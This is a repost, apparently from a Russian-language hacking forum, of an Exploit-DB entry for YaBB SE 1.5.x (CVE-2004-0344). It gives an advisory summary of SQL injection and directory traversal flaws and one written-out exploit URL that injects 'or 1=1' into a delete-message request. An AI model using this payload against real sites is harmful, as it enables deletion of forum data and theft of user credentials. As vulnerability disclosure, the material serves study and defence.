Exploit YaBB SE 1.5.x - Arbitrary File Deletion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23774
Проверка EDB
  1. Пройдено
Автор
ALNITAK & BACKSPACE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-0344
Дата публикации
2004-03-01
Код:
source: https://www.securityfocus.com/bid/9774/info

It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database.

YaBB SE versions 1.5.4, 1.5.5, and 1.5.5b are reported to be affected by these issues, however it is possible that other versions are vulnerable as well.

http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
 
Источник
www.exploit-db.com

Похожие темы